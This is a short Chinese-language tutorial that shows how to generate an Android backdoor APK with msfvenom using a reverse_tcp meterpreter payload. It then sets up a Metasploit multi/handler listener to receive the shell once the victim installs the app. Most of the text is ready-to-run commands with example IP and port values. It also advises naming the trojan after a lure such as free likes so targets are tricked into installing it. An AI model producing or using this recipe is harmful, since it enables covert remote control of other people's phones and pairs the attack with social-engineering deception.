msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
演示环境
命令: sudo su 解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可
2.生成可执行木马文件
命令: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R > .apk 实例: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk 解释:本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址 本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性 文件名可以随便写自己喜欢的名字,比如写免费刷赞,可能更容易让目标主机上钩
这个就是Kali主机的IP地址
接下来运行命令生成木马
默认生成的文件在根目录下
把刚才生成的安卓后门放到目标靶机中去
3.运行msfconsole命令
命令: msfconsole
4.配置参数
(1)命令: use exploit/multi/handler(选择模块) (2)命令: set payload android/meterpreter/reverse_tcp(选择攻击模块) (3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址) (4)命令: set lport 5555(填写刚才生成文件时的端口号) (5)命令: show options(查看设置参数) (6)命令: exploit -z -j(后台执行)
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行 详细攻击配置参数演示: